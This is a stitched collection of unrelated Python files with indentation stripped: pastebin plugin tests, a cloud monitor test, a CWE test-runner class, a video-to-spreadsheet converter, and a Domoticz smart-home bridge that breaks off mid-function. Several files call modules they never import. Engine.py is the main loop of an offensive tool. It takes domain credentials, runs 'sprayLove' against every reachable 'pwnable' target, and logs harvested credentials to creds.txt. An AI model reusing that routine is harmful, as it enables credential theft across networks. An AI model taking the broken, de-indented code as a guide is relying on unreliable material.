from http.client import RemoteDisconnected
import pytest
import requests
from pygments.lexers import PythonLexer, TextLexer, get_lexer_by_name
from porcupine import get_main_window, utils
from porcupine.plugins.pastebin import DPaste, SuccessDialog, Termbin
# utils.run_in_thread() can make tests fragile
@pytest.fixture
def dont_run_in_thread(monkeypatch):
def func(blocking_function, done_callback, check_interval_ms=69, daemon=True):
try:
result = blocking_function()
except Exception:
done_callback(False, traceback.format_exc())
else:
done_callback(True, result)
monkeypatch.setattr(utils, "run_in_thread", func)
@pytest.mark.pastebin_test
def test_dpaste_syntax_choices():
# download the json data representing valid syntax choices linked from dpaste docs
response = requests.get("https://dpaste.com/api/v2/syntax-choices/")
response.raise_for_status()
syntax_choices = response.json()
# These are wrong for whatever reason (different pygments versions?)
del syntax_choices["amdgpu"]
del syntax_choices["ansys"]
del syntax_choices["asc"]
del syntax_choices["cddl"]
del syntax_choices["futhark"]
del syntax_choices["gcode"]
del syntax_choices["graphviz"]
del syntax_choices["gsql"]
del syntax_choices["ipython2"]
del syntax_choices["ipython3"]
del syntax_choices["ipythonconsole"]
del syntax_choices["jslt"]
del syntax_choices["json-object"]
del syntax_choices["kuin"]
del syntax_choices["meson"]
del syntax_choices["nestedtext"]
del syntax_choices["nodejsrepl"]
del syntax_choices["omg-idl"]
del syntax_choices["output"]
del syntax_choices["procfile"]
del syntax_choices["smithy"]
del syntax_choices["teal"]
del syntax_choices["ti"]
del syntax_choices["wast"]
for syntax_choice in syntax_choices.keys():
assert syntax_choice == get_lexer_by_name(syntax_choice).aliases[0]
@pytest.mark.pastebin_test
@pytest.mark.parametrize("paste_class", [DPaste, Termbin])
def test_pastebin(paste_class):
some_code = "import foo as bar\nprint('baz')"
for lexer in [TextLexer, PythonLexer]:
url = paste_class().run(some_code, lexer)
assert isinstance(url, str)
response = requests.get(url)
response.raise_for_status()
if response.text.strip().startswith("<!DOCTYPE"):
# html and regexes ftw
assert some_code in re.sub(r"<.*?>", "", response.text).replace("'", "'")
else:
# raw url
assert response.text.strip() == some_code.strip()
@pytest.mark.pastebin_test # TODO: switch to localhost HTTPS server?
def test_dpaste_canceling(monkeypatch):
monkeypatch.setattr("porcupine.plugins.pastebin.DPASTE_URL", "https://httpbin.org/delay/3")
paste = DPaste()
got_error = False
def thread_target():
nonlocal got_error
try:
paste.run("hello world", TextLexer)
except RemoteDisconnected: # the error that it raises when canceled
got_error = True
thread = threading.Thread(target=thread_target)
thread.start()
start = time.time()
time.sleep(1)
paste.cancel()
thread.join()
assert time.time() - start < 1.05
assert got_error
def test_success_dialog(mocker):
dialog = SuccessDialog("http://example.com/poop")
dialog.clipboard_append("this junk should be gone soon")
dialog.copy_to_clipboard()
assert dialog.clipboard_get() == "http://example.com/poop"
# make sure that webbrowser.open is called
mock = mocker.patch("porcupine.plugins.pastebin.webbrowser")
assert dialog.winfo_exists()
dialog.open_in_browser()
assert not dialog.winfo_exists()
mock.open.assert_called_once_with("http://example.com/poop")
dialog.destroy()
def test_lots_of_stuff_with_localhost_termbin(
filetab, monkeypatch, mocker, tabmanager, dont_run_in_thread
):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
with socket.socket() as termbin:
termbin.settimeout(5)
termbin.bind(("localhost", 0))
termbin.listen(1)
monkeypatch.setattr(
"porcupine.plugins.pastebin.TERMBIN_HOST_AND_PORT", termbin.getsockname()
)
thread_done = False
fake_wait_window_done = False
def fake_termbin():
with termbin.accept()[0] as sock:
assert sock.recv(1024) == b"hello world\n"
sock.sendall(b"http://example.com/\n\0")
nonlocal thread_done
thread_done = True
thread = threading.Thread(target=fake_termbin)
thread.start()
tabmanager.select(filetab)
filetab.textwidget.insert("end", "hello world\n")
def fake_wait_window(success_dialog):
assert success_dialog.title() == "Pasting Succeeded"
assert success_dialog.url == "http://example.com/"
success_dialog.destroy()
nonlocal fake_wait_window_done
fake_wait_window_done = True
monkeypatch.setattr(tkinter.Toplevel, "wait_window", fake_wait_window)
get_main_window().event_generate("<<Menubar:Pastebin/termbin.com>>")
thread.join()
get_main_window().update()
assert thread_done and fake_wait_window_done
def test_paste_error_handling(monkeypatch, caplog, mocker, tabmanager, filetab, dont_run_in_thread):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
monkeypatch.setattr("porcupine.plugins.pastebin.DPASTE_URL", "ThisIsNotValidUrlStart://wat")
mocker.patch("tkinter.messagebox.showerror")
tabmanager.select(filetab)
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
tkinter.messagebox.showerror.assert_called_once_with(
"Pasting failed", "Check your internet connection or try a different pastebin."
)
def test_invalid_return(filetab, tabmanager, mocker, caplog, dont_run_in_thread):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
mocker.patch("tkinter.messagebox.showerror")
mocker.patch("porcupine.plugins.pastebin.DPaste.run").return_value = "lol"
tabmanager.select(filetab)
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
tkinter.messagebox.showerror.assert_called_once_with(
"Pasting failed", "Instead of a valid URL, dpaste.com returned 'lol'."
)
assert caplog.record_tuples == [
(
"porcupine.plugins.pastebin",
logging.ERROR,
"pastebin 'dpaste.com' returned invalid url: 'lol'",
)
]
def test_pasting_selected_indented_code(
filetab, tabmanager, monkeypatch, mocker, dont_run_in_thread
):
mocker.patch("porcupine.plugins.pastebin.ask_are_you_sure").return_value = True
monkeypatch.setattr("tkinter.Toplevel.wait_window", tkinter.Toplevel.destroy)
mock_run = mocker.patch("porcupine.plugins.pastebin.DPaste.run")
mock_run.return_value = "https://foobar"
filetab.textwidget.insert(
"1.0",
"""\
if foo:
bar
if baz:
lol
""",
)
filetab.textwidget.tag_add("sel", "2.0", "5.0")
tabmanager.select(filetab)
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
mock_run.assert_called_once_with("bar\nif baz:\n lol\n", PythonLexer)
def test_are_you_sure_dialog(filetab, tmp_path, wait_until, mocker, monkeypatch):
mock_run = mocker.patch("porcupine.plugins.pastebin.DPaste.run")
dialogs = []
monkeypatch.setattr("tkinter.Toplevel.wait_window", (lambda d: dialogs.append(d)))
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
filetab.save_as(tmp_path / "lolwat.py")
get_main_window().event_generate("<<Menubar:Pastebin/dpaste.com>>")
assert len(dialogs) == 2
assert dialogs[0].title() == "Pastebin this file"
assert dialogs[1].title() == "Pastebin lolwat.py"
assert (
dialogs[0].nametowidget("content.label1")["text"]
== "Do you want to send the content of this file to dpaste.com?"
)
assert (
dialogs[1].nametowidget("content.label1")["text"]
== "Do you want to send the content of lolwat.py to dpaste.com?"
)
for d in dialogs:
d.destroy()
assert mock_run.call_count == 0 # closing the window cancels pastebinning
|
5min_alert_host_disk_read_iops.py
|
'''
Test about monitor trigger on host disk reading iops in five minutes
@author: Songtao,Haochen
'''
import os
import test_stub
import random
import time
import threading
import zstacklib.utils.ssh as ssh
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.monitor_operations as mon_ops
def test():
global trigger
global media
global trigger_action
test_item = "host.disk.io"
resource_type="HostVO"
vm_monitor_item = test_stub.get_monitor_item(resource_type)
if test_item not in vm_monitor_item:
test_util.test_fail('%s is not available for monitor' % test_item)
hosts = res_ops.get_resource(res_ops.HOST)
host = hosts[0]
duration = 300
expression = "host.disk.io{type=\"iops\", direction=\"read\"} > 60.1"
monitor_trigger = mon_ops.create_monitor_trigger(host.uuid, duration, expression)
send_email = test_stub.create_email_media()
media = send_email.uuid
trigger_action_name = "trigger"+ ''.join(map(lambda xx:(hex(ord(xx))[2:]),os.urandom(8)))
trigger = monitor_trigger.uuid
receive_email = os.environ.get('receive_email')
monitor_trigger_action = mon_ops.create_email_monitor_trigger_action(trigger_action_name, send_email.uuid, trigger.split(), receive_email)
trigger_action = monitor_trigger_action.uuid
host.password = os.environ.get('hostPassword')
ssh_cmd = test_stub.ssh_cmd_line(host.managementIp, host.username, host.password, port=int(host.sshPort))
rw = 'read'
t = threading.Thread(target=test_stub.run_disk_load1,args=(ssh_cmd, rw,))
t.start()
time.sleep(360)
test_stub.kill(ssh_cmd)
status_problem, status_ok = test_stub.query_trigger_in_loop(trigger,80)
test_util.action_logger('Trigger old status: %s triggered. Trigger new status: %s recovered' % (status_problem, status_ok ))
if status_problem != 1 or status_ok != 1:
test_util.test_fail('%s Monitor Test failed, expected Problem or OK status not triggered' % test_item)
mail_list = test_stub.receive_email()
keywords = "fired"
mail_flag = test_stub.check_email(mail_list, keywords, trigger, host.uuid)
if mail_flag == 0:
test_util.test_fail('Failed to Get Target: %s for: %s Trigger Mail' % (vm_uuid, test_item))
mon_ops.delete_monitor_trigger_action(trigger_action)
mon_ops.delete_monitor_trigger(trigger)
mon_ops.delete_email_media(media)
def error_cleanup():
global trigger
global media
global trigger_action
mon_ops.delete_monitor_trigger_action(trigger_action)
mon_ops.delete_monitor_trigger(trigger)
mon_ops.delete_email_media(media)
|
vulClassTester.py
|
#! /usr/bin/env python3
""" # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
This file has the custom PPAC methods to run tests on qemu|fpga.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # """
import sys, os
from besspin.cwesEvaluation.compat import cwesEvaluationCompatibilityLayer
from besspin.cwesEvaluation.PPAC import cweTests
from importlib.machinery import SourceFileLoader
import threading
from besspin.base.utils.misc import *
class vulClassTester(cwesEvaluationCompatibilityLayer):
def __init__ (self,settings):
super().__init__(settings)
return
def executeTest (self,binTest):
testName = binTest.split('.')[0]
if (hasattr(cweTests,testName)):
outLog = getattr(getattr(cweTests,testName),testName)(self,binTest)
elif (isEnabled('pocExploitsMode')):
self.terminateAndExit('<pocExploitsMode> not implemented',
exitCode=EXIT.Implementation)
else:
self.terminateAndExit(f"Calling unknown method <{testName}>.",exitCode=EXIT.Dev_Bug)
outLog = ''
return outLog
def executeOnRoot (self,commands):
switchBack = not self.isCurrentUserRoot
if (switchBack): #only do this if user is not root
self.switchUser()
for command in commands:
self.runCommand (command)
if (switchBack):
self.switchUser()
return
def socketCloseAndCollect (self,xSocket):
def closeSocket (xSocket):
try:
xSocket.close()
except Exception as exc:
warnAndLog("Unable to close socket.\n",doPrint=False,exc=exc)
xThread = threading.Thread(target=closeSocket, args=(xSocket,))
xThread.daemon = True
try:
socketName = xSocket.getsockname()
except Exception as exc:
socketName = "UNKNOWN"
warnAndLog("Unable to get socket name when closing. Maybe it was already closed.\n",doPrint=False,exc=exc)
getSetting('trash').throwThread(xThread,f"closing socket <{socketName}>")
xThread.start()
return xThread
|
Engine.py
|
# coding: utf-8
# Author: Lyderic LEFEBVRE
# Twitter: @lydericlefebvre
# Mail: lylefebvre.infosec@gmail.com
# LinkedIn: https://www.linkedin.com/in/lydericlefebvre
# Imports
import logging, traceback
from core.User import *
from core.Resources import *
from core.Targets import *
from core.SprayLove import *
from core.Colors import *
from core.Utils import *
from multiprocessing import Process
def run(args):
jobs = []
user = User(args.domain, args.username, args.password)
local_ip = retrieveMyIP()
try:
targets = listPwnableTargets(args.targets, user)
logging.warning("%sLet's spray some love... Be patient." % (warningGre))
for target in targets:
jobs.append(Process(target=sprayLove, args=(user, target, local_ip, args.remove, args.method)))
jobs[-1].start()
joinThreads(jobs, args.wait)
logging.warning("\n%sCredentials logged into: %s" % (warningGre, os.path.join(os.path.dirname(os.path.realpath(sys.argv[0])), 'misc', 'results', 'creds.txt')))
except KeyboardInterrupt:
logging.warning("%sKeyboard interrupt. Exiting." % (warningRed))
except Exception as e:
logging.warning("%sA problem occurs. Err: %s" % (warningRed, red))
logging.debug("%s==== STACKTRACE ====" % (blue))
if logging.getLogger().getEffectiveLevel() <= 10: traceback.print_exc(file=sys.stdout)
logging.debug("%s==== STACKTRACE ====%s" % (blue, white))
finally:
exit_gracefully(jobs, 10)
|
main.py
|
# /usr/bin/env python
# -*- coding:utf-8 -*-
# author: Handsome Lu time:2020/4/30
import shutil
import os
import cv2
from glob import glob
from PIL import Image
from openpyxl import Workbook
from openpyxl import utils
from openpyxl.styles import PatternFill
from PyQt5.QtWidgets import QApplication, QMainWindow
import back
import threading
import sys
def color(value):
temp = []
temp.append(value[2])
temp.append(value[1])
temp.append(value[0])
digit = list(map(str, range(10))) + list("ABCDEF")
string = ''
for i in temp:
a1 = i // 16
a2 = i % 16
string += digit[a1] + digit[a2]
return string
def del_temp():
ls = ['temp', 'temp_']
for x in ls:
if os.path.exists(x):
shutil.rmtree(x)
else:
print(x + '文件夹已消失,无需删除。')
def save_jpg(path,timeF,n): #存储路径,提取图片的间隔帧数,缩小倍数
cap = cv2.VideoCapture(path)
name = 0
i=0
if os.path.exists('temp_'):
pass
else:
os.makedirs('temp_')
while(cap.isOpened()):
i=i+1
ret, frame = cap.read()
if(i%timeF == 0):
if ret==True:
name += 1
cv2.imwrite('temp_/%03d.jpg'% name,frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows()
img_path = glob("temp_/*.jpg")
path_save = "temp/"
if os.path.exists('temp'):
pass
else:
os.makedirs('temp')
a = range(0, len(img_path))
i = 0
for file in img_path:
name = os.path.join(path_save, "%03d.jpg" % a[i])
im = Image.open(file)
z = im.size[0] / n
im.thumbnail((z, z))
im.save(name, 'JPEG')
i += 1
#所有图存入一个文件 暂时问题 :存储文件略大 最后打开就会错误
def jpg_wb(save_name):
wb = Workbook()
img_path = glob("temp/*.jpg")
name = 0
for file in img_path:
exec('sheet' + str(name) + '=wb.create_sheet(str(name))')
x = 1
img = cv2.imread(file)
for i in img:
exec('sheet' + str(name) + '.row_dimensions[x].height =20')
h = 1
for j in i:
exec('sheet' + str(name) + '.column_dimensions[utils.get_column_letter(h)].width =5')
fill = PatternFill("solid", fgColor=color(j))
exec('sheet' + str(name)+'.cell(row=x,column=h).fill=fill')
h += 1
x += 1
name += 1
# #保存文件
ws = wb["Sheet"]
wb.remove(ws)
wb.save(save_name + '.xlsx')
#一张图一个文件
def jpg_wb_2(save_name):
img_path = glob("temp/*.jpg")
if os.path.exists(save_name):
pass
else:
os.makedirs(save_name)
name = 0
for file in img_path:
name += 1
wb = Workbook()
sheet = wb.create_sheet('sheet')
x = 1
img = cv2.imread(file)
for i in img:
sheet.row_dimensions[x].height =20
h = 1
for j in i:
sheet.column_dimensions[utils.get_column_letter(h)].width =5
fill = PatternFill("solid", fgColor=color(j))
sheet.cell(row=x,column=h).fill=fill
h += 1
x += 1
# #保存文件
ws = wb["Sheet"]
wb.remove(ws)
wb.save(save_name + '/%03d.xlsx'%name)
def work():
combobox = ui.comboBox.currentIndex()
In = ui.lineEdit.text()
Out = ui.lineEdit_2.text()
timeF = ui.spinBox_2.value()
Red = ui.spinBox.value()
del_temp()
save_jpg(In, timeF, Red)
if combobox == 0:
jpg_wb_2(Out)
elif combobox == 1:
jpg_wb(Out)
del_temp()
ui.pushButton.setDisabled(0)
ui.pushButton.setText('开始')
def active():
t = threading.Thread(target=work)
ui.pushButton.setDisabled(1)
ui.pushButton.setText('等待')
t.start()
if __name__ == '__main__':
app = QApplication(sys.argv)
MainWindow = QMainWindow()
ui = back.Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
ui.pushButton.clicked.connect(active)
sys.exit(app.exec_())
|
smarthome.py
|
# -*- coding: utf-8 -*-
import hashlib
import os
import re
import subprocess
import sys
import threading
from collections.abc import Mapping
from itertools import product
from pid import PidFile
import requests
import trait
from auth import *
from const import (DOMOTICZ_TO_GOOGLE_TYPES, ERR_FUNCTION_NOT_SUPPORTED, ERR_PROTOCOL_ERROR, ERR_DEVICE_OFFLINE,
TEMPLATE, ERR_UNKNOWN_ERROR, ERR_CHALLENGE_NEEDED, DOMOTICZ_GET_ALL_DEVICES_URL, domains,
DOMOTICZ_GET_SETTINGS_URL, DOMOTICZ_GET_ONE_DEVICE_URL, DOMOTICZ_GET_SCENES_URL, CONFIGFILE, LOGFILE,
REQUEST_SYNC_BASE_URL, REPORT_STATE_BASE_URL, ATTRS_BRIGHTNESS, ATTRS_FANSPEED,
ATTRS_THERMSTATSETPOINT, ATTRS_COLOR_TEMP, ATTRS_PERCENTAGE, VERSION, DOMOTICZ_GET_VERSION)
from helpers import (configuration, readFile, saveFile, SmartHomeError, SmartHomeErrorNoChallenge, AogState, uptime,
getTunnelUrl, FILE_DIR, logger, ReportState, Auth, logfilepath)
DOMOTICZ_URL = configuration['Domoticz']['ip'] + ':' + configuration['Domoticz']['port']
CREDITS = (configuration['Domoticz']['username'], configuration['Domoticz']['password'])
if 'PidFile' in configuration:
pidfile = PidFile(pidname=configuration['PidFile'])
else:
pidfile = PidFile('dzga')
try:
logger.info("Connecting to Domoticz on %s" % DOMOTICZ_URL)
r = requests.get(
DOMOTICZ_URL + '/json.htm?type=command¶m=addlogmessage&message=Connected to Google Assistant with DZGA v' + VERSION,
auth=CREDITS, timeout=(2, 5))
except Exception as e:
logger.error('Connection to Domoticz refused with error: %s' % e)
try:
import git
repo = git.Repo(FILE_DIR)
branch = repo.active_branch.name
except:
repo = None
branch = ''
ReportState = ReportState()
if not ReportState.enable_report_state():
logger.error("Service account key is not found. Report state will be unavailable")
def checkupdate():
if repo is not None and 'CheckForUpdates' in configuration and configuration['CheckForUpdates'] == True:
try:
r = requests.get(
'https://raw.githubusercontent.com/DewGew/Domoticz-Google-Assistant/' + branch + '/const.py')
response = r.text
if VERSION not in response:
update = 1
logger.info("========")
logger.info(" New version is availible on Github!")
else:
update = 0
return update
except Exception as e:
logger.error('Connection to Github refused! Check configuration.')
return 0
else:
return 0
update = checkupdate()
# some way to convert a domain type: Domoticz to google
def AogGetDomain(device):
if device["Type"] in ['Light/Switch', 'Lighting 1', 'Lighting 2', 'Lighting 5', 'RFY', 'Value']:
if device["SwitchType"] in ['Blinds', 'Blinds Inverted', 'Venetian Blinds EU', 'Venetian Blinds US',
'Blinds Percentage', 'Blinds Percentage Inverted']:
return domains['blinds']
elif 'Door Lock' == device["SwitchType"]:
return domains['lock']
elif 'Door Lock Inverted' == device["SwitchType"]:
return domains['lockinv']
elif "Door Contact" == device["SwitchType"]:
return domains['door']
elif device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return domains['push']
elif 'Motion Sensor' == device["SwitchType"]:
return domains['sensor']
elif 'Selector' == device["SwitchType"]:
if device['Image'] == 'Fan':
return domains['fan']
else:
return domains['selector']
elif 'Smoke Detector' == device["SwitchType"]:
return domains['smokedetektor']
elif 'Camera_Stream' in configuration and True == device["UsedByCamera"] and True == \
configuration['Camera_Stream']['Enabled']:
return domains['camera']
elif device["Image"] == 'Generic':
return domains['switch']
elif device["Image"] in ['Media', 'TV']:
return domains['media']
elif device["Image"] == 'WallSocket':
return domains['outlet']
elif device["Image"] == 'Speaker':
return domains['speaker']
elif device["Image"] == 'Fan':
return domains['fan']
elif device["Image"] == 'Heating':
return domains['heater']
else:
return domains['light']
elif 'Blinds' == device["Type"]:
return domains['blinds']
elif 'Group' == device["Type"]:
return domains['group']
elif 'Scene' == device["Type"]:
return domains['scene']
elif device["Type"] in ['Temp', 'Temp + Humidity', 'Temp + Humidity + Baro']:
return domains['temperature']
elif 'Thermostat' == device['Type']:
return domains['thermostat']
elif 'Color Switch' == device["Type"]:
if "Dimmer" == device["SwitchType"]:
return domains['color']
elif "On/Off" == device["SwitchType"]:
logger.info('%s (Idx: %s) is a color switch. To get all functions, set this device as Dimmer in Domoticz', device["Name"], device[
"idx"])
return domains['light']
elif device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return domains['push']
elif 'Security' == device["Type"]:
return domains['security']
return None
def getDesc(state):
if state.domain in [domains['scene'], domains['group']]:
if 'Scene_Config' in configuration and configuration['Scene_Config'] is not None:
desc = configuration['Scene_Config'].get(int(state.id), None)
return desc
elif 'Device_Config' in configuration and configuration['Device_Config'] is not None:
desc = configuration['Device_Config'].get(int(state.id), None)
return desc
else:
return None
def getDeviceConfig(descstr):
ISLIST = ['nicknames']
rawconfig = re.findall(r'<voicecontrol>(.*?)</voicecontrol>', descstr, re.DOTALL)
if len(rawconfig) > 0:
try:
lines = rawconfig[0].strip().splitlines()
cfgdict = {}
for l in lines:
assign = l.split('=')
varname = assign[0].strip().lower()
if varname != "":
if varname in ISLIST:
allvalues = assign[1].split(',')
varvalues = []
for val in allvalues:
varvalues.append(val.strip())
cfgdict[varname] = varvalues
else:
varvalue = assign[1].strip()
if varvalue.lower() == "true":
varvalue = True
elif varvalue.lower() == "false":
varvalue = False
cfgdict[varname] = varvalue
except:
logger.error('Error parsing device configuration from Domoticz device description:', rawconfig[0])
return None
return cfgdict
return None
def getAog(device):
domain = AogGetDomain(device)
if domain is None:
return None
aog = AogState()
aog.name = device["Name"] # .encode('ascii', 'ignore')
aog.domain = domain
aog.id = device["idx"]
aog.entity_id = domain + aog.id
aog.plan = device.get("PlanID")
aog.state = device.get("Data", "Scene")
aog.level = device.get("LevelInt", 0)
aog.temp = device.get("Temp")
aog.humidity = device.get("Humidity")
aog.setpoint = device.get("SetPoint")
aog.color = device.get("Color")
aog.protected = device.get("Protected")
aog.maxdimlevel = device.get("MaxDimLevel")
aog.seccode = settings.get("SecPassword")
aog.secondelay = settings.get("SecOnDelay")
aog.tempunit = settings.get("TempUnit")
aog.battery = device.get("BatteryLevel")
aog.hardware = device.get("HardwareName")
aog.selectorLevelName = device.get("LevelNames")
aog.language = settings.get("Language")
aog.lastupdate = device.get("LastUpdate")
# Try to get device specific voice control configuration from Domoticz
# Read it from the configuration file if not in Domoticz (for backward compatibility)
desc = getDeviceConfig(device.get("Description"))
if desc is not None:
logger.debug('<voicecontrol> tags found for idx %s in domoticz description.', aog.id)
logger.debug('Device_Config for idx %s will be ignored in config.yaml!', aog.id)
if desc is None:
desc = getDesc(aog)
if desc is not None:
dt = desc.get('devicetype', None)
if dt is not None:
if aog.domain in [domains['blinds']]:
if dt.lower() in ['window', 'gate', 'garage', 'door']:
aog.domain = domains[dt.lower()]
if aog.domain in [domains['light'], domains['switch']]:
if dt.lower() in ['window', 'door', 'gate', 'garage', 'light', 'ac_unit', 'bathtub', 'coffemaker', 'dishwasher', 'dryer', 'fan', 'heater', 'kettle', 'media', 'microwave', 'outlet', 'oven', 'speaker', 'switch', 'vacuum', 'washer', 'waterheater']:
aog.domain = domains[dt.lower()]
if aog.domain in [domains['door']]:
if dt.lower() in ['window', 'gate', 'garage']:
aog.domain = domains[dt.lower()]
if aog.domain in [domains['selector']]:
if dt.lower() in ['vacuum']:
aog.domain = domains[dt.lower()]
n = desc.get('nicknames', None)
if n is not None:
aog.nicknames = n
r = desc.get('room', None)
if r is not None:
aog.room = r
ack = desc.get('ack', False)
if ack:
aog.ack = ack
report_state = desc.get('report_state', True)
if not ReportState.enable_report_state():
aog.report_state = False
if not report_state:
aog.report_state = report_state
if domains['thermostat'] == aog.domain:
at_idx = desc.get('actual_temp_idx', None)
if at_idx is not None:
aog.actual_temp_idx = at_idx
try:
aog.state = str(aogDevs[domains['temperature'] + at_idx].temp)
aogDevs[domains['temperature'] + at_idx].domain = domains['merged'] + aog.id + ')'
except:
logger.debug('Merge Error, Cant find temperature device with idx %s', at_idx)
modes_idx = desc.get('selector_modes_idx', None)
if modes_idx is not None:
aog.modes_idx = modes_idx
try:
aog.level = aogDevs[domains['selector'] + modes_idx].level
aog.selectorLevelName = aogDevs[domains['selector'] + modes_idx].selectorLevelName
aogDevs[domains['selector'] + modes_idx].domain = domains['merged'] + aog.id + ')'
except:
logger.debug('Merge Error, Cant find selector device with idx %s', modes_idx)
if aog.domain in [domains['heater'], domains['kettle'], domains['waterheater'], domains['oven']]:
tc_idx = desc.get('merge_thermo_idx', None)
if tc_idx is not None:
aog.merge_thermo_idx = tc_idx
try:
aog.temp = aogDevs[domains['thermostat'] + tc_idx].state
aog.setpoint = aogDevs[domains['thermostat'] + tc_idx].setpoint
aogDevs[domains['thermostat'] + tc_idx].domain = domains['merged'] + aog.id + ')'
except:
logger.debug('Merge Error, Cant find thermostat device with idx %s', tc_idx)
hide = desc.get('hide', False)
if hide:
aog.domain = domains['hidden']
if aog.domain in [domains['camera']]:
aog.report_state = False
if domains['light'] == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if domains['fan'] == aog.domain and "Selector" == device["SwitchType"]:
aog.attributes = ATTRS_FANSPEED
if domains['outlet'] == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if domains['color'] == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if domains['color'] == aog.domain and device["SubType"] in ["RGBWW", "White"]:
aog.attributes = ATTRS_COLOR_TEMP
if domains['thermostat'] == aog.domain and "Thermostat" == device["Type"]:
aog.attributes = ATTRS_THERMSTATSETPOINT
if domains['blinds'] == aog.domain and "Blinds Percentage" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
if domains['blinds'] == aog.domain and "Blinds Percentage Inverted" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
if domains['vacuum'] == aog.domain and "Selector" == device["SwitchType"]:
aog.attributes = ATTRS_VACCUM_MODES
if aog.room == None:
if aog.domain not in [domains['scene'], domains['group']]:
if aog.plan is not "0":
aog.room = getPlans(aog.plan)
return aog
aogDevs = {}
deviceList = {}
def getDevices(devices="all", idx="0"):
global aogDevs
global deviceList
url = ""
if "all" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ALL_DEVICES_URL + configuration['Domoticz'][
'roomplan'] + '&filter=all&used=true'
elif "scene" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_SCENES_URL
elif "id" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ONE_DEVICE_URL + idx
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
devs = r.json()['result']
for d in devs:
aog = getAog(d)
if aog is None:
continue
aogDevs[aog.entity_id] = aog
if 'loglevel' in configuration and (configuration['loglevel']).lower() == 'debug':
req = {aog.name: {}}
req[aog.name]['idx'] = int(aog.id)
req[aog.name]['type'] = aog.domain
req[aog.name]['state'] = aog.state
req[aog.name]['lastupdate'] = aog.lastupdate
if aog.nicknames is not None:
req[aog.name]['nicknames'] = aog.nicknames
if aog.modes_idx is not None:
req[aog.name]['modes_idx'] = aog.modes_idx
if aog.hide is not False:
req[aog.name]['hidden'] = aog.hide
if aog.actual_temp_idx is not None:
req[aog.name]['actual_temp_idx'] = aog.actual_temp_idx
if aog.merge_thermo_idx is not None:
req[aog.name]['merge_thermo_idx'] = aog.merge_thermo_idx
req[aog.name]['willReportState'] = aog.report_state
logger.debug(json.dumps(req, indent=2, sort_keys=False, ensure_ascii=False))
devlist = [(d.name, int(d.id), d.domain, d.state, d.room, d.nicknames, d.report_state) for d in aogDevs.values()]
devlist.sort(key=takeSecond)
deviceList = json.dumps(devlist)
def takeSecond(elem):
return elem[1]
def deep_update(target, source):
"""Update a nested dictionary with another nested dictionary."""
for key, value in source.items():
if isinstance(value, Mapping):
target[key] = deep_update(target.get(key, {}), value)
else:
target[key] = value
return target
settings = {}
settings['dzversion'] = "Unavailable"
def getSettings():
"""Get domoticz settings."""
global settings
url = DOMOTICZ_URL + DOMOTICZ_GET_SETTINGS_URL
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
devs = r.json()
settings['SecPassword'] = devs['SecPassword']
settings["SecOnDelay"] = devs["SecOnDelay"]
settings['TempUnit'] = devs['TempUnit']
settings['Language'] = devs['Language']
getVersion()
logger.debug(json.dumps(settings, indent=2, sort_keys=False, ensure_ascii=False))
def getVersion():
"""Get domoticz version."""
global settings
url = DOMOTICZ_URL + DOMOTICZ_GET_VERSION
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
vers = r.json()
settings['dzversion'] = vers['version']
def getPlans(idx):
"""Get domoticz plan name."""
global settings
url = DOMOTICZ_URL + '/json.htm?type=plans&order=name&used=true'
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
rooms = r.json()['result']
plan = [i for i in rooms if i['idx'] == idx][0]
return plan['Name']
def restartServer():
"""Restart."""
logger.info(' ')
logger.info("Restart server")
logger.info(' ')
pidfile.close()
os.execv(sys.executable, ['python'] + sys.argv)
class _GoogleEntity:
"""Adaptation of Entity expressed in Google's terms."""
def __init__(self, state):
self.state = state
@property
def entity_id(self):
"""Return entity ID."""
return self.state.entity_id
def traits(self):
"""Return traits for entity."""
state = self.state
domain = state.domain
features = state.attributes
t = [Trait(state) for Trait in trait.TRAITS
if Trait.supported(domain, features)]
return t
def sync_serialize(self, agent_user_id):
"""Serialize entity for a SYNC response.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
state = self.state
enableReport = ReportState.enable_report_state()
traits = self.traits()
# Found no supported traits for this entity
if not traits:
return None
if enableReport:
reportState = state.report_state
else:
reportState = enableReport
device = {
'id': state.entity_id,
'name': {
'name': state.name
},
'attributes': {},
'traits': [trait.name for trait in traits],
'willReportState': reportState,
'deviceInfo': {
'manufacturer': "Domoticz",
"model": state.hardware
},
'type': DOMOTICZ_TO_GOOGLE_TYPES[state.domain],
}
# use aliases
aliases = state.nicknames
if aliases:
device['name']['nicknames'] = [state.name] + aliases
for trt in traits:
device['attributes'].update(trt.sync_attributes())
# Add room hint if annotated
room = state.room
if room:
device['roomHint'] = room
return device
def query_serialize(self):
"""Serialize entity for a QUERY response.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
state = self.state
# if state.state == STATE_UNAVAILABLE:
# return {'online': False}
attrs = {'online': True}
for trt in self.traits():
deep_update(attrs, trt.query_attributes())
return attrs
def execute(self, command, params, challenge):
